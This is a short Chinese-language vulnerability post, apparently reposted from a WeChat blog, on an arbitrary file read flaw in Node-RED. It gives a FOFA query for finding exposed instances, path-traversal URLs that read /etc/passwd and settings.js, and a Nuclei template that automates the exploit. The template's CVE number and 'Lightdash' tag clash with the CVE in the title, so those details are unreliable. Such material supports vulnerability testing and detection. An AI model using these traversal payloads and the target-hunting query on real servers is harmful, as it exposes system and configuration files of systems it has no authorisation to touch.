一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
fofa:title="Node-RED"
四、漏洞复现:
http://target/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://target/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
五、POC:
nuclei:
id: node_red_filesRead
info:
name: node_red_filesRead
author: joyboy
severity: critical
description: http://xxx.xxx.xxx/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
metadata:
max-request: 1
fofa-query: title="Node-RED"
verified: true
CVE: CVE-2023-35844
tags: readfile,Lightdash,cve,cve2023
requests:
- method: GET
path:
- "{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'root:'
原文始发于微信公众号(fly的渗透学习笔记):Node-RED任意文件读取漏洞 (CVE-2021-3223)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论